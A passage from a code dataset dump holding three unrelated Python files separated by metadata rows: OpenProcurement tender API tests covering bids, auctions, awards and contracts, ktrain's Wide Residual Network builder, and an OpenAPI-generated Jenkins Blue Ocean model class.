{"data": {"features": [{"code": "OCDS-123-POSTPONEMENT"}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["features"][0]["code"])
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'parameters': [{"code": "OCDS-123-POSTPONEMENT"}],
'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["parameters"][0]["code"])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"features": [{"enum": [{"value": 0.2}]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(0.2, response.json['data']["features"][0]["enum"][0]["value"])
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'parameters': [{"value": 0.2}],
'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["parameters"][0]["code"])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"features": []}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotIn("features", response.json['data'])
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def invalid_bid_tender_lot(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
lots = []
for lot in test_lots * 2:
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': lot})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
lots.append(response.json['data']['id'])
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'status': 'draft',
'lotValues': [{"value": {"amount": 500}, 'relatedLot': i} for i in lots],
'tenderers': [test_organization]}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.delete('/tenders/{}/lots/{}?acc_token={}'.format(tender_id, lots[0], owner_token))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def one_valid_bid_tender_ua(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering XXX temporary action.
response = self.set_status('active.tendering',
{"auctionPeriod": {"startDate": (get_now() + timedelta(days=16)).isoformat()}})
self.assertIn("auctionPeriod", response.json['data'])
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
bid_id = self.bid_id = response.json['data']['id']
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def invalid1_and_1draft_bids_tender(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True, 'status': 'draft',
'tenderers': [test_organization], "value": {"amount": 500}}})
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
# get awards
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def activate_bid_after_adding_lot(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(
self.tender_id, owner_token), {'data': test_lots[0]})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
lot_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'status': 'active', 'value': None,
'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id}]}})
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.assertNotIn("value", response.json)
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
# get awards
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def first_bid_tender(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering
self.set_status('active.tendering')
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'tenderers': [test_organization], "value": {"amount": 450}, 'selfEligible': True, 'selfQualified': True}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'tenderers': [test_organization], "value": {"amount": 475}, 'selfEligible': True, 'selfQualified': True}})
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(tender_id))
auction_bids_data = response.json['data']['bids']
# posting auction urls
response = self.app.patch_json('/tenders/{}/auction'.format(tender_id),
{
'data': {
'auctionUrl': 'https://tender.auction.url',
'bids': [
{
'id': i['id'],
'participationUrl': 'https://tender.auction.url/for_bid/{}'.format(i['id'])
}
for i in auction_bids_data
]
}
})
# view bid participationUrl
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.assertEqual(response.json['data']['participationUrl'], 'https://tender.auction.url/for_bid/{}'.format(bid_id))
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json('/tenders/{}/auction'.format(tender_id),
{'data': {'bids': auction_bids_data}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as unsuccessful
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
{"data": {"status": "unsuccessful"}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.assertNotEqual(award_id, award2_id)
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.assertNotEqual(award_id, award2_id)
# create first award complaint
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active", "qualified": True, "eligible": True}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# create tender contract document for test
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(tender_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
# after stand slill period
self.app.authorization = ('Basic', ('chronograph', ''))
self.set_status('complete', {'status': 'active.awarded'})
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(tender_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't add document in current (complete) tender status")
response = self.app.patch_json('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(tender_id, contract_id, doc_id, owner_token), {"data": {"description": "document description"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) tender status")
response = self.app.put('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(tender_id, contract_id, doc_id, owner_token), upload_files=[('file', 'name.doc', 'content3')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) tender status")
def lost_contract_for_active_award(self):
self.app.authorization = ('Basic', ('broker', ''))
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 450}}})
# create bid #2
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 450}}})
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(tender_id))
auction_bids_data = response.json['data']['bids']
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json('/tenders/{}/auction'.format(tender_id),
{'data': {'bids': auction_bids_data}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
{"data": {"status": "active", "qualified": True, "eligible": True}})
# lost contract
tender = self.db.get(tender_id)
tender['contracts'] = None
self.db.save(tender)
# check tender
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'active.awarded')
self.assertNotIn('contracts', response.json['data'])
self.assertIn('next_check', response.json['data'])
# create lost contract
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'active.awarded')
self.assertIn('contracts', response.json['data'])
self.assertNotIn('next_check', response.json['data'])
contract_id = response.json['data']['contracts'][-1]['id']
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token),
{"data": {"status": "active"}})
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
| 52.004836 | 203 | 0.6316 | 5,981 | 53,773 | 5.569972 | 0.06203 | 0.104461 | 0.151888 | 0.066459 | 0.833764 | 0.807048 | 0.786006 | 0.773399 | 0.74137 | 0.734406 | 0 | 0.015685 | 0.193759 | 53,773 | 1,033 | 204 | 52.055179 | 0.752733 | 0.024324 | 0 | 0.623669 | 0 | 0.001183 | 0.271023 | 0.047849 | 0 | 0 | 0 | 0 | 0.342012 | 1 | 0.017751 | false | 0 | 0.008284 | 0 | 0.026036 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efa0bc70cd0b0a818eeae8321271796c3948a31 | 7,434 | py | Python | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | [
"Apache-2.0"
] | null | null | null | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | [
"Apache-2.0"
] | null | null | null | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | [
"Apache-2.0"
] | null | null | null | from ..imports import *
weight_decay = 0.0005
def initial_conv(input):
x = keras.layers.Convolution2D(
16,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(input)
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
return x
def expand_conv(init, base, k, strides=(1, 1)):
x = keras.layers.Convolution2D(
base * k,
(3, 3),
padding="same",
strides=strides,
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(init)
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
base * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
skip = keras.layers.Convolution2D(
base * k,
(1, 1),
padding="same",
strides=strides,
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(init)
m = keras.layers.Add()([x, skip])
return m
def conv1_block(input, k=1, dropout=0.0):
init = input
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
16 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
16 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
def conv2_block(input, k=1, dropout=0.0):
init = input
# channel_axis = 1 if K.image_dim_ordering() == "th" else -1
channel_axis = -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
32 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
32 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
def conv3_block(input, k=1, dropout=0.0):
init = input
# channel_axis = 1 if K.image_dim_ordering() == "th" else -1
channel_axis = -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
64 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
64 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
def create_wide_residual_network(
input_dim, nb_classes=100, N=2, k=1, activation="softmax", dropout=0.0, verbose=1
):
"""
Creates a Wide Residual Network with specified parameters
:param input: Input Keras object
:param nb_classes: Number of output classes
:param N: Depth of the network. Compute N = (n - 4) / 6.
Example : For a depth of 16, n = 16, N = (16 - 4) / 6 = 2
Example2: For a depth of 28, n = 28, N = (28 - 4) / 6 = 4
Example3: For a depth of 40, n = 40, N = (40 - 4) / 6 = 6
:param k: Width of the network.
:param dropout: Adds dropout if value is greater than 0.0
:param verbose: Debug info to describe created WRN
:return:
"""
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
ip = keras.layers.Input(shape=input_dim)
x = initial_conv(ip)
nb_conv = 4
x = expand_conv(x, 16, k)
nb_conv += 2
for i in range(N - 1):
x = conv1_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = expand_conv(x, 32, k, strides=(2, 2))
nb_conv += 2
for i in range(N - 1):
x = conv2_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = expand_conv(x, 64, k, strides=(2, 2))
nb_conv += 2
for i in range(N - 1):
x = conv3_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.AveragePooling2D((8, 8))(x)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(
nb_classes,
kernel_regularizer=keras.regularizers.l2(weight_decay),
activation=activation,
)(x)
model = keras.Model(ip, x)
if verbose:
print("Wide Residual Network-%d-%d created." % (nb_conv, k))
return model
if __name__ == "__main__":
init = (32, 32, 3)
wrn_28_10 = create_wide_residual_network(init, nb_classes=10, N=2, k=2, dropout=0.0)
wrn_28_10.summary()
keras.utils.plot_model(
wrn_28_10, "WRN-16-2.png", show_shapes=True, show_layer_names=True
)
| 27.533333 | 88 | 0.610035 | 1,002 | 7,434 | 4.377246 | 0.134731 | 0.107843 | 0.101231 | 0.062244 | 0.775878 | 0.76311 | 0.76311 | 0.752394 | 0.752394 | 0.752394 | 0 | 0.041682 | 0.254506 | 7,434 | 269 | 89 | 27.635688 | 0.749729 | 0.089454 | 0 | 0.795918 | 0 | 0 | 0.055125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030612 | false | 0 | 0.005102 | 0 | 0.066327 | 0.005102 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efa1485445888e3e668d930ddd339e95670ceac | 6,010 | py | Python | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 23 | 2017-08-01T12:25:26.000Z | 2022-01-25T03:44:11.000Z | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 35 | 2017-06-14T03:28:15.000Z | 2022-02-14T10:25:54.000Z | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 11 | 2017-08-31T19:00:20.000Z | 2021-12-19T12:04:12.000Z | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.extension_class_impl import ExtensionClassImpl # noqa: F401,E501
from openapi_server import util
class ExtensionClassContainerImpl1map(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl=None, io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl=None, _class: str=None): # noqa: E501
"""ExtensionClassContainerImpl1map - a model defined in OpenAPI
:param io_jenkins_blueocean_service_embedded_rest_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map. # noqa: E501
:type io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl
:param io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map. # noqa: E501
:type io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl
:param _class: The _class of this ExtensionClassContainerImpl1map. # noqa: E501
:type _class: str
"""
self.openapi_types = {
'io_jenkins_blueocean_service_embedded_rest_pipeline_impl': ExtensionClassImpl,
'io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl': ExtensionClassImpl,
'_class': str
}
self.attribute_map = {
'io_jenkins_blueocean_service_embedded_rest_pipeline_impl': 'io.jenkins.blueocean.service.embedded.rest.PipelineImpl',
'io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl': 'io.jenkins.blueocean.service.embedded.rest.MultiBranchPipelineImpl',
'_class': '_class'
}
self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_pipeline_impl
self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
self.__class = _class
@classmethod
def from_dict(cls, dikt) -> 'ExtensionClassContainerImpl1map':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ExtensionClassContainerImpl1map of this ExtensionClassContainerImpl1map. # noqa: E501
:rtype: ExtensionClassContainerImpl1map
"""
return util.deserialize_model(dikt, cls)
@property
def io_jenkins_blueocean_service_embedded_rest_pipeline_impl(self) -> ExtensionClassImpl:
"""Gets the io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:return: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:rtype: ExtensionClassImpl
"""
return self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl
@io_jenkins_blueocean_service_embedded_rest_pipeline_impl.setter
def io_jenkins_blueocean_service_embedded_rest_pipeline_impl(self, io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl):
"""Sets the io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:param io_jenkins_blueocean_service_embedded_rest_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_pipeline_impl of this ExtensionClassContainerImpl1map.
:type io_jenkins_blueocean_service_embedded_rest_pipeline_impl: ExtensionClassImpl
"""
self._io_jenkins_blueocean_service_embedded_rest_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_pipeline_impl
@property
def io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl(self) -> ExtensionClassImpl:
"""Gets the io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:return: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:rtype: ExtensionClassImpl
"""
return self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
@io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl.setter
def io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl(self, io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl):
"""Sets the io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:param io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: The io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl of this ExtensionClassContainerImpl1map.
:type io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl: ExtensionClassImpl
"""
self._io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl = io_jenkins_blueocean_service_embedded_rest_multi_branch_pipeline_impl
@property
def _class(self) -> str:
"""Gets the _class of this ExtensionClassContainerImpl1map.
:return: The _class of this ExtensionClassContainerImpl1map.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class: str):
"""Sets the _class of this ExtensionClassContainerImpl1map.
:param _class: The _class of this ExtensionClassContainerImpl1map.
:type _class: str
"""
self.__class = _class
